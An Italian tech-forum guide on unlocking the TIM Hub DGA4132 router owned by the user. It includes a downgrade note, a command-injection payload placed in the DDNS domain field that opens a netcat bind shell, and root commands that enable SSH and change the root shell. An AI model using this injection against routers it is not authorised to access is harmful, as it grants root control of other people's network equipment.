Sblocco TIM Hub DGA4132 (AGTHP)

Rieccoci! Anche questa volta il nostro forum si è dato da fare ottenendo un risultato molto importante: dopo il DGA4130, è disponibile lo sblocco per il DGA4132! In realtà i risultati sono due, poiché a partire dal firmware 1.0.5 la falla sfruttata è stata corretta, ma per coloro che si sono trovati con il modem/router aggiornato automaticamente abbiamo una procedura di downgrade alla versione 1.0.3, così da permettere nuovamente lo sblocco. Bando alle ciance, passiamo subito alla guida:

Lo staff e gli utenti de ilpuntotecnicoeadsl.com non si assumono alcuna responsabilità in caso di problematiche dovute allo sblocco quali danneggiamento dell’apparato, richiami da parte del provider e sblocco del proprio modem/router da parte di utenti da voi non autorizzati connessi alla vostra rete locale. Qualunque procedura di alterazione di un prodotto è da considerarsi propria responsabilità ed invalida la garanzia !

Preparazione

  • Come anticipato nell’introduzione, se il vostro modem/router dispone del firmware aggiornato dovrete prima tornare alla versione 1.0.3, seguendo questa guida separata. Il firmware è disponibile a questo indirizzo.
  • Useremo il comando netcat (abbreviato in nc), solitamente disponibile in ambienti UNIX. Se siete utenti Windows, lo potrete scaricare facendo una rapida ricerca sul web: si tratta di un programma gratuito largamente utilizzato.

Sblocco

  1. Accedete all’interfaccia web del router (il cui indirizzo di default è 192.168.1.1) con username admin e password admin
  2. Aprite la tab “Servizi WAN”, scorrete in fondo nella sezione DDNS e inserite questa stringa nel campo “Dominio”:
    uno.due.com;nc -lvvvp 1337 -e /bin/bash &
    Attivate il servizio DynDNS e infine salvate
  3. Aprite una finestra di terminale (e se siete utenti Windows, spostatevi nella cartella dove avete estratto netcat), inserite il comando
    nc 192.168.1.1 1337
    e date invio. Aspettate che il DGA4132 inizi a comunicare
  4. Una volta ricevuta conferma dell’inizio della comunicazione, cambiate la password dell’utente root con una piacere (e sicura!)
    passwd root
  5. Abilitiamo dropbear per consentire l’accesso via ssh e abilitiamo la shell per l’utente root
    uci set dropbear.lan.enable=1
    uci set dropbear.lan.RootPasswordAuth=on
    uci commit
    sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd
  6. Per finire, un bel riavvio di dropbear per fargli caricare le nuove impostazioni
    /etc/init.d/dropbear restart

Vi invitiamo a partecipare al topic ufficiale dell’articolo sul forum, in cui potete scrivere anche in caso di dubbi o domande.

 

Copyright 2018 Tutti i diritti riservati.
La presente guida non può essere copiata, modificata, distribuita, con alcun mezzo senza l’esplicita autorizzazione dell’autore e dello staff de ilpuntotecnicoeadsl.com

 

Fabio

Appassionato di informatica e di programmazione in particolare, si diverte a rompere (per la scienza, s'intende) qualunque apparato gli capiti a tiro. Nessun apparecchio in casa sua ha ancora il software di fabbrica.

Altri articoli

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

*